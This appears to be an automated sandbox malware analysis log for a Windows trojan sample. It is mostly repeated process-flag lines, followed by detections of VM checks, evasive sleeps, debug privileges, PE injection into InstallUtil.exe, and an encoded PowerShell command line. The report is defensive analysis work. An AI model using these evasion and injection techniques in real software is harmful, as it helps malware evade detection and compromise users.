Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe TID: 2880 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe TID: 5836 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5268 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9082 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: SecuriteInfo.com.Variant.Tedy.181709.30142.exe, 00000000.00000003.242646366.0000000003659000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dwqEMujlmq8lY
Source: Yjgcdbfyd.exe, 0000001D.00000002.534059345.0000000005F76000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Yjgcdbfyd.exe, 0000001D.00000002.534301956.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2Ii6
Source: Yjgcdbfyd.exe, 0000001D.00000002.534301956.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MWar&Prod_VMware
Source: Yjgcdbfyd.exe, 0000001D.00000002.534301956.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Yjgcdbfyd.exe, 0000001B.00000002.502491999.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, Yjgcdbfyd.exe, 0000001D.00000002.501372835.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Yjgcdbfyd.exe, 0000001B.00000002.521576703.00000000063D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11
Enables debug privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 438000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43A000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1170008 Jump to behavior
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process created: Base64 decoded Start-Sleep -Seconds 60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process created: Base64 decoded Start-Sleep -Seconds 60 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgAwAA== Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
